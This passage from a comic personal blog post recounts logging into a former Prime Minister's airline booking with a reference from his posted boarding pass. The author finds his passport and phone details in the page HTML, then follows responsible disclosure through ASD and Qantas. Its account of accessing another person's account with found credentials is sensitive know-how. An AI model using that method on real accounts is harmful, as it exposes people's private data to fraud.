<p>Well, the login form was just… <em>there</em>, and it was asking for a Booking Reference and a last name. I had just flawlessly read the Booking Reference from the boarding pass picture, and, well… I knew the last name<sup id="fnref:lastname" role="doc-noteref"><a href="#fn:lastname" class="footnote" rel="footnote">7</a></sup>.</p>
<p>I did hesitate for a split-second, but… no, I had to know.</p>
<h3 id="step-5-crimes">Step 5: Crimes(?)</h3>
<video class="sunburntcountry" controls="" preload="auto">
<source src="/img/sunburnt-country/youngman.mp4" type="video/mp4" />
<img src="/img/sunburnt-country/summary.gif" />
</video>
<p style="text-align:center"><em>youngman.mp4</em></p>
<p><img src="/img/sunburnt-country/loggedin.png" alt="The logged in "manage booking page"" />
<em>The “Manage Booking” page, logged in as some guy called Anthony Abbott</em></p>
<h3 id="can-i-get-a-yikes-in-the-chat">Can I get a YIKES in the chat</h3>
<p>Leave a comment if you really felt that.</p>
<p><img src="/img/sunburnt-country/yikes.png" alt="yikes" /></p>
<p>I guess I was now logged the heck in as Tony Abbott? And for all I know, everyone else who saw his Instagram post was right there with me. It’s kinda wholesome, to imagine us all there together. But also probably suboptimal in a governmental sense.</p>
<h5 id="was-there-anything-secret-in-here">Was there anything secret in here?</h5>
<p>I then just incredibly browsed the page, browsed it so hard.</p>
<p>I saw Tony Abbott’s name<sup id="fnref:name" role="doc-noteref"><a href="#fn:name" class="footnote" rel="footnote">8</a></sup>, flight times, and Frequent Flyer number, but not really anything <em>super</em> secret-looking. Not gonna be committing any cyber treason with a Frequent Flyer number. The flight was in the past, so I couldn’t change anything, either.</p>
<p>The page said the flight had been booked by a travel agent, so I guessed some information would be missing because of that.</p>
<p>I clicked around and scrolled a considerable length, but still didn’t find any government secrets.</p>
<p>Some people might give up here. But I, the Icarus of computers, was simply too dumb to know when to stop.</p>
<h3 id="were-not-done-just-because-a-web-page-says-were-done">We’re not done just because a <em>web page</em> says we’re done</h3>
<p>I wanted to see if there were juicy things hidden <em>inside</em> the page. To do it, I had to use the <em>only</em> hacker tool I know.</p>
<p><img src="/img/sunburnt-country/inspectelement.png" alt="Right click > Inspect-small" />
<em>Right click > Inspect Element, all you need to subvert the Commonwealth of Australia</em></p>
<p>Listen. This is the only part of the story that might be confused for highly elite computer skill. It’s not, though. Maybe later someone will show you this same thing to try and flex, acting like only <em>they</em> know how to do it. You will not go gently into that good night. You will refuse to acknowledge their flex, killing them instantly.</p>
<h5 id="how-does-inspect-element-work">How does “Inspect Element” work?</h5>
<p>“Inspect Element”, as it’s called, is a feature of Google Chrome that lets you see the computer’s internal representation (HTML) of the page you’re looking at. Kinda like opening up a clock and looking at the cool cog party inside.</p>
<p><img src="https://upload.wikimedia.org/wikipedia/commons/6/67/Pocketwatch_cutaway_drawing.jpg" alt="cog party|small" />
<em>Yeahhh go little cogs, look at ‘em absolutely going off. Now imagine this but with like, JavaScript</em></p>
<p>Everything you see when you use “Inspect Element” was already downloaded to your computer, you just hadn’t asked Chrome to show it to you yet. Just like how the cogs were already in the watch, you just hadn’t opened it up to look.</p>
<p>But let us dispense with frivolous cog talk. Cheap tricks such as “Inspect Element” are used by programmers to try and understand how the website works. This is ultimately futile: Nobody can understand how websites work. Unfortunately, it kinda <em>looks</em> like hacking the first time you see it.</p>
<p>If you’d like to know more about it, I’ve prepared a short video.</p>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">hey youtube welcome to my hacking tutorial, today we're gonna hack.... the nsa <a href="https://t.co/2Z35GJjSZE">pic.twitter.com/2Z35GJjSZE</a></p>— “Alex” (@mangopdf) <a href="https://twitter.com/mangopdf/status/1123400764926226432?ref_src=twsrc%5Etfw">May 1, 2019</a></blockquote>
<script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<h3 id="browsing-the-manage-booking-pages-html">Browsing the “Manage Booking” page’s HTML</h3>
<p>I scrolled around the page’s HTML, not really knowing what it meant, furiously trying to find anything that looked out of place or secret.</p>
<p>I eventually realised that manually reading HTML with my eyes was not an efficient way of defending my country, and Ctrl + F’d the HTML for “passport”.</p>
<h3 id="oh-no">oh no</h3>
<p><img src="/img/sunburnt-country/passportjson.gif" alt="Blurred screenshot of close up "passport" number" /></p>
<h3 id="oh-yes">Oh yes</h3>
<p>It’s just <em>there</em>.</p>
<p>At this point I was fairly sure I was looking at the <em>extremely</em> secret government-issued ID of the <em>28th Prime Minister of the Commonwealth of Australia, servant to her Majesty Queen Elizabeth II</em> and I was <em>kinda</em> worried that I was somehow doing something wrong, but like, not enough to stop.</p>
<h3 id="anything-else-in-this-page">….anything <em>else</em> in this page?</h3>
<p>Well damn, if Tony Abbott’s passport number is in this treasure trove of computer spaghetti, maybe there’s wayyyyy more. Perhaps this HTML contains the lost launch codes to the Sydney Opera House, or Harold Holt<sup id="fnref:holt" role="doc-noteref"><a href="#fn:holt" class="footnote" rel="footnote">9</a></sup>.</p>
<p>Maybe there’s a phone number?</p>
<p>Searching for <code class="language-plaintext highlighter-rouge">phone</code> and <code class="language-plaintext highlighter-rouge">number</code> didn’t get anywhere, so I searched for <code class="language-plaintext highlighter-rouge">614</code>, the first 3 digits of an Australian phone number, using my colossal and highly celestial galaxy brain.</p>
<h5 id="weird-uppercase-letters">Weird uppercase letters</h5>
<p>A weird pile of what I could only describe as extremely uppercase letters came up. It looked like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>RQST QF HK1 HNDSYD/03EN|FQTV QF HK1|CTCM QF HK1 614[phone number]|CKIN QF HN1 DO NOT SEAT ROW [row number] PLS SEAT LAST ROW OF [row letter] WINDOW
</code></pre></div></div>
<p>So, there’s a lot going on here. There is indeed a phone number in here. But what the heck is all this <em>other</em> stuff?</p>
<p>I realised this was like… Qantas staff talking to eachother <em>about</em> Tony Abbott, but not <em>to</em> him?</p>
<p>In what is surely the subtweeting of the century, it has a section saying <code class="language-plaintext highlighter-rouge">HITOMI CALLED RQSTING FASTTRACK FOR MR. ABBOTT</code>. Hitomi must be requesting a “fasttrack” (I thought that was only a thing in movies???) from another Qantas employee.</p>
<h5 id="this-is-messed-up-for-many-reasons">This is messed up for many reasons</h5>
<p>What is even going on here? Why do Qantas flight staff talk to eachother via this passenger information field? Why do they send these messages, and your passport number <em>to</em> you when you log in to their website? I’ll never know because I suddenly got distracted with</p>
<h3 id="forbidden-airline-code">Forbidden airline code</h3>
<p>I realised the allcaps muesli I saw must be some airline code for something. Furious and intense googling led me to several ancient forbidden PDFs that explained some of the codes.</p>
<p>Apparently, they’re called “SSR codes” (Special Service Request). There are codes for things like “Vegetarian lacto-ovo meal” (<code class="language-plaintext highlighter-rouge">VLML</code>), “Vegetarian oriental meal” (<code class="language-plaintext highlighter-rouge">VOML</code>), and even “Vegetarian vegan meal” (<code class="language-plaintext highlighter-rouge">VGML</code>). Because I was curious about these codes, here’s some for you to be curious about too (tag urself, I’m <code class="language-plaintext highlighter-rouge">UMNR</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>RFTV Reason for Travel
UMNR Unaccompanied minor
PDCO Carbon Offset (chargeable)
WEAP Weapon
DEPA Deportee—accompanied by an escort
ESAN Passenger with Emotional Support Animal in Cabin
</code></pre></div></div>
<p>The phone number I found looked like this: <code class="language-plaintext highlighter-rouge">CTCM QF HK1 [phone number]</code>. Googling “SSR CTCM” led me to the <a href="https://guides.developer.iata.org/docs/ctcm">developer guide</a> for some kind of airline association, which I assume I am basically a member of now.</p>
<p><img src="/img/sunburnt-country/ctcm.png" alt="CTCM|medium" />
<em><code class="language-plaintext highlighter-rouge">CTCM QF HK1</code> translates as “Contact phone number of passenger 1”</em></p>
<h4 id="is-the-phone-number-actually-his">Is the phone number actually his?</h4>
<p>I thought maybe the phone number belonged to the travel agency, but I <a href="https://portal.iata.org/faq/articles/en_US/FAQ/Is-it-mandatory-for-travel-agents-to-provide-the-passenger-s-mobile-phone-and-email-address-1448977338174">checked</a> and it has to be the passenger’s real phone number. That would be, if my calculations are correct,,,, *steeples fingers* Tony Abbott’s phone number.</p>
<h2 id="what-have-i-done">what have i done</h2>
<p>I’d now found Tony Abbott’s:</p>
<ul>
<li>Passport details</li>
<li>Phone number</li>
<li>Weird Qantas staff comments.</li>
</ul>
<p>My friend who messaged me had <em>no idea</em>.</p>
<p>Tony Abbott’s passport is probably a <a href="https://en.wikipedia.org/wiki/Australian_passport#Diplomatic_and_Official_Passport">Diplomatic passport</a>, which is used to “represent the Australian Government overseas in an official capacity”.</p>
<h2 id="what-have-i-done-1">what have i <em>done</em></h2>
<p>By this point I’d had enough defending my country, and had recently noticed some new thoughts in my brain<sup id="fnref:brain" role="doc-noteref"><a href="#fn:brain" class="footnote" rel="footnote">10</a></sup>, which were:</p>
<ul>
<li><em>oh jeez oh boy oh jeez</em></li>
<li><em>i gotta get someone, somehow, to reset tony abbott’s passport number</em></li>
<li><em>can you even reset passport numbers</em></li>
<li><em>is it possible that i’ve done a crime</em></li>
</ul>
<hr />
<h1 id="intermission">Intermission</h1>
<p><img src="/img/sunburnt-country/intermission.jpg" alt="anime is real" /></p>
<hr />
<h1 id="act-2-do-not-get-arrested-challenge-2020">Act 2: Do not get arrested challenge 2020</h1>
<blockquote>
<p>In this act, I, your well-meaning but ultimately incompetent protagonist, attempt to do the following things:</p>
</blockquote>
<ul>
<li>⬜ figure out whether i have done a crime</li>
<li>⬜ notify someone (tony abbott?) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>⬜ tell qantas about the security issue so they can fix it</li>
</ul>
<blockquote>
<p>Spoilers: This takes almost six months.</p>
</blockquote>
<hr />
<h4 id="lets-skip-the-boring-bits">Let’s skip the boring bits</h4>
<p>I contacted a <em>lot</em> of people about this. If my calculations are correct<sup id="fnref:calculations" role="doc-noteref"><a href="#fn:calculations" class="footnote" rel="footnote">11</a></sup>, I called at least 30 phone numbers, to say nothing of The Emails. If you laid all the people I contacted end to end along the equator, they would die, and you would be arrested. Eventually I started keeping track of who I talked to in a note I now refer to as “the hashtag struggle”.</p>
<p>I’m gonna skip a considerable volume of tedious and ultimately unsatisfying telephony, because it’s been a long day of scrolling already, and you need to save your strength.</p>
<p>Alright strap yourself in and enjoy as I am drop-kicked through the goal posts of life.</p>
<hr />
<h2 id="part-1-is-it-possible-that-ive-done-a-crime">Part 1: is it possible that i’ve done a crime</h2>
<p>I didn’t <em>think</em> anything I did sounded like a crime, but I knew that sometimes when the other person is rich or famous, things can suddenly <em>become</em> crimes. Like, was there going to be some Monarch Law or something? Was Queen Elizabeth II gonna be mad about this?</p>
<p>My usual defence against being arrested for hacking is making sure the person being hacked is okay with it. You heard me, it’s the power of ✨consent✨. But this time I could uh only get it in retrospect, which is a bit yikes.</p>
<p>So I was wondering like… was logging in with someone else’s booking reference a crime? Was <em>having</em> someone else’s passport number a crime? What if they were, say, the former Prime Minister? Would I get in trouble for publishing a blog post about it? I mean you’re reading the blog post right now so obviousl</p>
<p>Update: I have been arrested.</p>
<h3 id="just-straight-up-reading-the-law">Just straight up Reading The Law</h3>
<p>It turned out I could just google these things, and before I knew it I was reading “the legislation”. It’s the rules of the law, just written down.</p>
<p>Look, reading pages of HTML? No worries. Especially if it’s to defend my country. But whoever wrote the legislation was just making up words.</p>
<p>Eventually, I was able to divine the following wisdoms from the Times New Roman tea leaves:</p>
<ul>
<li>Defamation is where you get in trouble for publishing something that makes someone look bad.
<ul>
<li>But, it’s fine for me to blog about it, since it’s not defamation if you can prove it’s <em>true</em></li>
</ul>
</li>
<li>Having Tony Abbott’s passport number isn’t a crime
<ul>
<li>But using it to commit identity fraud would be</li>
</ul>
</li>
<li>There are laws about what it’s okay to do on a computer
<ul>
<li>The things it’s okay to do are: If u EVER even LOOK at a computer the wrong way, the FBI will instantly slam dunk you in a legal fashion dependent on the legislation in your area</li>
</ul>
</li>
</ul>
<p>I am possibly the furthest thing you can be from a lawyer. So, I’m sure I don’t need to tell you not to take this as legal advice. But, if you <em>are</em> the kind of person who takes legal advice from mango blog posts, who am I to stand in your way? Not a lawyer, that’s who. Don’t do it.</p>
<p>You know what, maybe I needed help. From an adult. Someone whose 3-year old kid has been buying iPad apps for months because their parents can’t figure out how to turn it off.</p>
<p><em>“Yeah, maybe I should get some of that free government legal advice”</em>, I thought to myself, legally. That seemed like a pretty common thing, so I thought it should be easy to do. I took a big sip of water and googled “free legal advice”.</p>
<h3 id="trying-to-ask-a-lawyer-if-i-gone-and-done-a-crime">trying to ask a lawyer if i gone and done a crime</h3>
<p>Before I went and told everyone about my HTML frolicking, I spent a week calling legal aid numbers, lawyers, and otherwise trying to figure out if I’d done a crime<sup id="fnref:noplan" role="doc-noteref"><a href="#fn:noplan" class="footnote" rel="footnote">12</a></sup>.</p>
<p>During this time, I didn’t tell <em>anyone</em> what I’d done. I asked if any laws would be broken if “someone” had “logged into a website with someone’s publicly-posted password and found the personal information of a former politician”. Do you see how that’s not even a lie? I’m starting to see how lawyers do it.</p>
<h4 id="calling-legal-aid-places">Calling Legal Aid places</h4>
<p>First I call the state government’s Legal Aid number.
They tell me they don’t <em>do that</em> here, and I should call another Legal Aid place named something slightly different.</p>
<p>The second place tells me they don’t <em>do that</em> either, and I should call the First Place and “hopefully you get someone more senior”.</p>
<p>I call the First Place again, and they say “oh you’ve been given the run around!”. You see where this is going.</p>
<p>Let’s skip a lot of phone calls. Take my hand as I whisk you towards the slightly-more-recent past. Based on advice I got from two independent lawyers that was definitely not legal advice: I haven’t done a crime.</p>
<p>Helllllll yeah. But I mean it’s a little late because I forgot to mention that by this point I had already emailed explicit details of my activities to the Australian Government.</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>⬜ notify someone (tony abbott?) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>⬜ tell qantas about the security issue so they can fix it</li>
</ul>
<h2 id="part-2-trying-to-report-the-problem-to-someone-anyone-please">Part 2: trying to report the problem to someone, anyone, please</h2>
<p>I had Tony Abbott’s passport number, phone number, and weird Qantas messages about him. I was the only one who <em>knew</em> I had these.</p>
<p>Anyone who saw that Instagram post could also have them. I felt like I had to like, <em>tell</em> someone about this. Someone with like, responsibilities. Someone with an email signature.</p>
<h3 id="wait-but-do-u-see-the-irony-in-this-u-have-his-phone-number-right-there-so-u-could-just-">wait but do u see the irony in this, u have his phone number right there so u could just-</h3>
<p>Yes I see it thank u for pointing this out, wise, astute, and ultimately self-imposed heading. I <em>knew</em> I could just call the number any time and hear a “G’day” I’d <em>never</em> be able to forget. I knew I had a rare opportunity to call someone and have them ask “how did you get this number!?”.</p>
<p>But you can’t just <em>do</em> that.</p>
<p>You can’t just call someone’s phone number that you got by rummaging around in the HTML ball pit. Tony Abbott didn’t <em>want</em> me to have his phone number, because he didn’t give it to me. Maybe if it was urgent, or I had no other option, sure. But I was pretty sure I should do this the Nice way, and show that I come in peace.</p>
<p>I wanted to show that I come in peace because there’s also this pretty yikes thing that happens where you email someone being all like “henlo ur website let me log in with username <code class="language-plaintext highlighter-rouge">admin</code> and password <code class="language-plaintext highlighter-rouge">admin</code>, maybe u wanna change that??? could just be me but let me kno what u think xoxo alex” and then they reply being like “oh so you’re a HACKER and a CRIMINAL and you’ve HACKED ME AND MY FAMILY TOO and this is a RANSOM and ur from the DARK WEB i know what that is i’ve seen several episodes of mr robot WELL watch out kiddO bc me and my lawyers are bulk-installing tens of thousands of copies of <a href="https://www.mcafee.com/en-us/antivirus/gaming.html">McAfee® Gamer Security</a> as we speak, so i’d like 2 see u try”</p>
<h3 id="surely-you-just-contact-tony-abbott-officially">Surely you just contact Tony Abbott officially</h3>
<p>I googled “tony abbott contact”, but there’s only his <a href="https://tonyabbott.com.au">official website</a>. There’s no phone number on it, only a “contact me” form.</p>
<p><img src="/img/sunburnt-country/contact.png" alt="Contact me form|medium" />
<em>I imagine there have been some passionate opinions typed into this form at 9pm on a Tuesday</em></p>
<p>Yeah right, have you <em>seen</em> the incredible volume of #content people want to say at politicians? No way anyone’s reading that form.</p>
<p>I later decided to try anyway, using the same Inspect Element ritual from earlier. Looking at the network requests the page makes, I divined that the “Contact me” form just straight up does not work. When you click “submit”, you get an error, and nothing gets sent.</p>
<p><img src="/img/sunburnt-country/contact_us_403_error.png" alt="Contact us 403|" />
<em>This is an excellent way of using computers to solve the problem of “random people keep sending me angry letters”</em></p>
<p>Well rip I guess<sup id="fnref:underconstruction" role="doc-noteref"><a href="#fn:underconstruction" class="footnote" rel="footnote">13</a></sup>. I eventually realised the people to talk to were probably the government.</p>
<h2 id="the-government">The government</h2>
<p>It’s a big place.</p>
<p>In the beginning, humans developed the concept of language by banging rocks together and saying “oof, oog, and so on”. Then something went horribly wrong, and now people unironically begin every sentence with “in regards to”. Our story begins here.</p>
<p>The government has like fifty thousand million different departments, and they all know which acronyms to call each other, but you don’t. If you EVER call it DMP&C instead of DPM&C you are gonna be express email forwarded into a nightmare realm the likes of which cannot be expressed in <em>any</em> number of spreadsheet cells, in spite of all the good people they’ve lost trying.</p>
<p>I didn’t even know where to begin with this. Desperately, I called Tony Abbott’s former political party, who were all like</p>
<p><img src="/img/sunburnt-country/chess.png" alt="they were all like this-medium" /></p>
<p>Skip skip skip a few more calls like this.</p>
<h3 id="maybe-i-knew-someone-who-knew-someone">Maybe I knew someone who knew someone</h3>
<p><em>That’s</em> right, the true government channels were the friends we made along the way.</p>
<p>I asked hacker friends who seemed like they might know government security people. “Where do I report a security issue with like…. a person, not a website?”</p>
<p>They told me to call… 1300 CYBER1?</p>
<h3 id="1300-cyber1">1300 CYBER1</h3>
<p>I don’t really have a good explanation for this so I’m just gonna post the screenshots.</p>
<p><img src="/img/sunburnt-country/cyber11.png" alt="Screenshot of 1300 CYBER1 chat|small" />
<em>My friend showing me where to report a security issue with the government. I’m gonna need you to not ask any questions about the profile pictures.</em></p>
<p><img src="/img/sunburnt-country/cyber1website.png" alt="cyber1website" />
<em>Uhhh no wait I don’t wanna click any of these</em></p>
<p><img src="/img/sunburnt-country/cyber12.png" alt="Screenshot of 1300 CYBER1 chat second half|large" />
<em>The planet may be dying, but we live in a truly unparalleled age of content.</em></p>
<p>You <em>know</em> I smashed that call button on <code class="language-plaintext highlighter-rouge">1300 CYBER1</code>. Did they just make it <code class="language-plaintext highlighter-rouge">1300 CYBER</code> then realise you need one more digit for a phone number? Incredible.</p>
<h3 id="calling-1300-c-y-b-e-r-------o-n-e">Calling <code class="language-plaintext highlighter-rouge">1300 c y b e r o n e</code></h3>
<blockquote>
<p>“Yes yes hello, ring ring, is this 1300 cyber one”? They <em>have</em> to say yes if you ask that. They’re legally obligated.</p>
</blockquote>
<p>The person who picked up gave me an email address for <a href="https://www.asd.gov.au/">ASD</a> (the Australian flavour of America’s NSA), and told me to email them the details.</p>
<h3 id="emailing-the-government-my-crimes">Emailing the government my crimes</h3>
<p>Feeling like the digital equivalent of three kids in a trenchcoat, I broke out my best Government Email dialect and emailed ASD, asking for them to call me if they were the right place to tell about this.</p>
<p><img src="/img/sunburnt-country/asdemail.png" alt="ASD email|medium" />
<em>Sorry for the clickbait subject but well that’s what happened???</em></p>
<p>Fooled by my flawless disguise, they replied <em>instantly</em> (in a relative sense) asking for more details.</p>
<p><img src="/img/sunburnt-country/asdreply.png" alt="ASD reply|medium" />
<em>“Potential” exposure, yeah okay. At least the subject line had “[SEC=Sensitive]” in it so I _knew_ I’d made it big</em></p>
<p>I <em>absolutely</em> could provide them with more information, so I did, because I love to cooperate with the Australian government.</p>
<p>I also asked whether they could give me permission to publish this blog post, and they were all like “Seen 2:35pm”. Eventually, after another big day of getting left on read by the government, they replied, being all like “thanks kiddO, we’re doing like, an <em>investigation</em> and stuff, so we’ll take it from here”.</p>
<p>Overall, ASD were really nice to me about it and happy that I’d helped. They encouraged me to report this kind of thing to them if it happened again, but I’m not really in the business of uhhhhhhhh whatever the heck this is.</p>
<p>By the way, at this point in the story (chronologically) I had <em>no</em> idea if what I was emailing the government was actually the confession to a crime, since I hadn’t talked to a lawyer yet. This is widely regarded as a bad move. I do not recommend anyone else use “but I’m being so helpful and earnest!!!” as a legal defence. But also I’m not a lawyer, so idk, maybe it works?</p>
<h3 id="wholesomely-emailing-the-government">Wholesomely emailing the government</h3>
<p>At one point in what was surely an unforgettable email chain, the person I was emailing added a P.S. containing…. the answer to the puzzle hidden on this website. The one you’re reading this blog on right now. Hello.
I guess they must have found this website (hi asd) by stalking the email address I was sending from. This is unprecedented and everything, but:</p>
<ol>
<li>The puzzle says to <a href="https://twitter.com/mangopdf">tweet</a> the answer at me, not email me</li>
<li>The prize for doing the puzzle is me tweeting this gif of a shakas to you<sup id="fnref:prize" role="doc-noteref"><a href="#fn:prize" class="footnote" rel="footnote">14</a></sup></li>
</ol>
<p><img src="https://media.giphy.com/media/13JoHhCFtUMAZa/giphy.gif" alt="shakas.gif|tiny" />
<em>yeahhhhhhhhhh, nice</em></p>
<p>So I guess I emailed the shakas gif to the government??? Yeah, I guess I did.</p>
<p><img src="/img/sunburnt-country/shakas_attached.png" alt="shakas attached dw" />
<em>Please find attached</em></p>
<h4 id="can-i-write-about-this">Can I write about this?</h4>
<p>I asked them if they could give me permission to write this blog post, or who to ask, and they were like “uhhhhhhhhhhh” and gave me two government media email addresses to try. Listen I don’t wanna be an “ummm they didn’t reply to my emAiLs” kinda person buT they simply left me no choice.</p>
<p>Still, defending the Commonwealth was in ASD’s hands now, and that’s a win for me at this point.</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>☑️ notify someone (The Government) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>⬜ tell qantas about the security issue so they can fix it</li>
</ul>
<h2 id="part-3-telling-qantas-the-bad-news">Part 3: Telling Qantas the bad news</h2>
<h3 id="the-security-issue">The security issue</h3>
<p>Hey remember like fifteen minutes ago when this post was about webpages?</p>
<p>I’m guessing Qantas didn’t <em>want</em> to send the customer their passport number, phone number, and staff comments about them, so I wanted to let them know their website was doing that. Maybe the website was well meaning, but ultimately caused more harm than good, like how that time the bike path railings on the Golden Gate Bridge accidentally <a href="https://www.theguardian.com/us-news/2020/jun/06/golden-gate-bridge-san-francisco-sings">turned it into the world’s largest harmonica</a>.</p>
<h4 id="unblending-the-smoothie">Unblending the smoothie</h4>
<p>But why does the website even send you all that stuff in the first place? I don’t know, but to speculate wildly: Maybe the website just sends you <em>all</em> the data it knows about you, and then only shows you your name, flight times, etc, while leaving the passport number etc. still in the page.</p>
<p>If that were true, then Qantas would want to unblend the digital smoothie they’ve sent you, if you will. They’d want to change it so that they only send you your name and flight times and stuff (which are a key ingredient of the smoothie to be sure), not the whole identity fraud smoothie.</p>
<h3 id="smoothie-evangelism">Smoothie evangelism</h3>
<p>I wanted to tell them the smoothie thing, but how do I contact them?</p>
<p>The first place to check is usually <code class="language-plaintext highlighter-rouge">company.com/security</code>, maybe that’ll w-</p>
<p><img src="/img/sunburnt-country/qantas_security_not_found.png" alt="qantas security not found|small" />
<em>Okay nevermind</em></p>
<p>Okay fine maybe I should just email <code class="language-plaintext highlighter-rouge">security@qantas.com.au</code> surely that’s it? I could only find a phone number to report security problems to, and I wasn’t sure if it was like…. airport security?</p>
<p>So I just… called the number and was like “heyyyy uhhhh I’d like to report a cyber security issue?”, and the person was like “yyyyya just email security@qantas.com.au” and i was like “ok sorrY”.</p>
<h3 id="time-to-email-qantas-i-guess">Time to email Qantas I guess</h3>
<p>I emailed Qantas, being like “beep boop here is how the computer problem works”.</p>
<p><img src="/img/sunburnt-country/qantasemail.png" alt="Email to Qantas security-medium" /></p>
<p>(Have you been wondering about the little dots in this post? Click this one for the rest of the email <sup id="fnref:qantasemail" role="doc-noteref"><a href="#fn:qantasemail" class="footnote" rel="footnote">15</a></sup>.)</p>
<p>A few days later, I got this reply.</p>
<p><img src="/img/sunburnt-country/qantasreply.png" alt="Reply from Qantas security-medium" /></p>
<h3 id="and-then-i-never-heard-from-this-person-again">And then I never heard from this person again</h3>
<p>Airlines were going through kinda a <em>struggle</em> at the time, so I guess that’s what happened?</p>
<p><img src="/img/sunburnt-country/qantasreplybutdumb.png" alt="pls|medium" />
<em>if ur still out there Shr Security i miss u</em></p>
<h3 id="struggles">Struggles</h3>
<p>After filling up my “get left on read” combo meter, I desperately resorted to calling Qantas’ secret media hotline number<sup id="fnref:spam" role="doc-noteref"><a href="#fn:spam" class="footnote" rel="footnote">16</a></sup>.</p>
<p>They said the issue was being fixed by <a href="https://en.wikipedia.org/wiki/Amadeus_CRS">Amadeus</a>, the company who makes their booking software, rather than with Qantas itself. I’m not sure if that means other Amadeus customers were also affected, or if it was just the way Qantas was using their software, or what.</p>
<p>It’s common to give companies 90 days to fix the bug, before you publicly disclose it. It’s a tradeoff between giving them enough time to fix it, and people being hacked because of the bug as long as it’s out there.</p>
<p>But, well, this was kinda a special case. Qantas was going through some #struggles, so it was taking longer. Lots of their staff were stood down, and the world was just generally more cooked. At the same time, hardly anybody was flying at the time, due to see above re: #struggles. So, I gave Qantas as much time as they needed.</p>
<h3 id="five-months-later">Five months later</h3>
<p>The world is a completely different place, and Qantas replies to me, saying they fixed the bug.
It <em>did</em> take five months, which is why it took so long for you and I to be having this weird textual interaction right now.</p>
<p>I don’t have a valid Booking Reference, so I can’t actually check what’s changed. I asked a friend to check (with an expired Booking Reference), and they said they didn’t see a mention of “documentNumber” anymore, which sounds like the passport number is no longer there. But That’s Not Science, so I don’t know for sure.</p>
<p>I originally found the bug in March, which was about 60 years ago. BUT we got there baybee, Qantas emailed me saying the bug had been fixed on August 21. They later told me they actually fixed the bug in July, but the person I was talking to didn’t know about it until August.</p>
<p>Qantas also said this when I asked them to review this post:</p>
<blockquote>
<p>Thanks again for letting us have the opportunity to review and again for refraining from posting until the fix was in place for vulnerability.</p>
</blockquote>
<blockquote>
<p>Our standard advice to customers is not to post pictures of the boarding pass, or to at least obscure the key personal information if they do, because of the detail it contains.</p>
</blockquote>
<blockquote>
<p>We appreciate you bringing it to our attention in such a responsible way, so we could fix the issue, which we did a few months ago now.</p>
</blockquote>
<p>I couldn’t find any advice on their website about not posting pictures of customer boarding passes, only news articles about how <a href="https://www.escape.com.au/news/big-change-coming-to-your-qantas-boarding-pass/news-story/1946086dcb3dab1ef614af6322b2585f">Qantas stopped printing the Frequent Flyer number on the boarding pass</a> last year, because… well, you can see why.</p>
<p>I also asked Qantas what they did to fix the bug, and they said:</p>
<blockquote>
<p>Unfortunately we’re not able to provide the details of fix as it is part of the protection of personal information.</p>
</blockquote>
<p>:((</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>☑️ notify someone (The Government) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>☑️ tell qantas about the security issue so they can fix it</li>
</ul>
<h2 id="part-4-finding-tony-abbott">Part 4: Finding Tony Abbott</h2>
<p>Like 2003’s <em>Finding Nemo</em>, this section was an emotional rollercoaster.</p>
<p>The government was presumably helping Tony Abbott reset his passport number, and making sure his current one wasn’t being used for any of that yucky identity fraud.</p>
<p>But, much like Shannon Noll’s 2004 <a href="https://www.youtube.com/watch?v=uCda5P_f4S8"><em>What About Me?</em></a>, what <em>about</em> me? I really wanted to write a blog post about it, you know? So I could warn people about the non-obvious risk of sharing their boarding passes, and also make dumb and inaccessible references to the early 2000s.</p>
<p>The government people I talked to couldn’t give me permission to write this post, so rather than willingly wandering deeper into the procedurally generated labyrinth of government department email addresses (it’s dark in there), I tried to find Tony Abbott or his staff directly.</p>
<h3 id="calling-everybody-in-australia-one-by-one">Calling everybody in Australia one by one</h3>
<p>I called Tony Abbott’s former political party again, and asked them how to contact him, or his office, or <em>something</em> I’m really having a moment rn. They said they weren’t associated with him anymore, and suggested I call <em>Parliament House</em>, like I was the Queen or something.</p>
<p><img src="https://www.fma.com.au/sites/default/files/imagecache/event_full/uploaded-content/field_f_content_image/aph_from_website.jpg" alt="picture of parliament house" /></p>
<p>In case you don’t know it, Parliament House is sorta like the White House, I think? The Prime Minister lives there and has a nice little garden out the back with a macadamia tree that never runs out, and everyone works in different colourful sections like “Making it so Everyone Gets a Fair Shake of the Sauce Bottle R&D” and “Mateship” and they all wear matching uniforms with lil kangaroo and emu hats, and they all do a little dance every hour on the hour to celebrate another accident-free day in the Prime Minister’s chocolate factory.</p>
<h3 id="calling-parliament-house-i-guess">calling parliament house i guess</h3>
<p>Not really sure what to expect, I called up and was all like “yeah bloody g’day, day for it ay, hot enough for ya?”. Once the formalities were out of the way, I skipped my usual explanation of why I was calling and just asked point-blank if they had Tony Abbott’s contact details.</p>
<p>The person on the phone was casually like “Oh, no, but I can put you through to the <em>Serjeant-at-arms</em>, who can give you the contact details of former members”. I was like “…..okay?????”. Was I supposed to know who that was? Isn’t a Serjeant like an army thing?</p>
<p>But no, the Serjeant-at-arms was just a nice lady who told me “he’s in a temporary office right now, and so doesn’t have a phone number. I can give you an email address or a P.O. box?”. I was like “ok th-thank you your majesty”.</p>
<p>It felt a bit weird just…. emailing the former PM being like “boy do i have bad news for <em>you</em>”, but I figured he probably wouldn’t read it anyway. If it was <em>that</em> easy to get this email address, everyone had it, and so nobody was likely to be reading the inbox.</p>
<p>Spoilers: It didn’t work.</p>
<h3 id="finding-tony-abbotts-staff">Finding Tony Abbott’s staff</h3>
<p>I roll out of bed and stare bleary-eyed into the morning sun, my ultimate nemesis, as Day 40 of not having found Tony Abbott’s staff begins.</p>
<p><em>This</em> time for sure.</p>
<p>Retinas burning, in a moment of determination/desperation/hubris, I went and asked even <em>more</em> people that <em>might</em> know how to contact Tony Abbott’s staff.</p>
<p>I asked a journalist friend, who had the kind of ruthlessly efficient ideas that come from, like, being a professional journalist. They suggested I find Tony Abbott’s former staff from when he was PM, and contact their offices and see if they have his contact details.</p>
<p>It was a strange sounding plan to me, which I thought meant it would <em>definitely</em> work.</p>
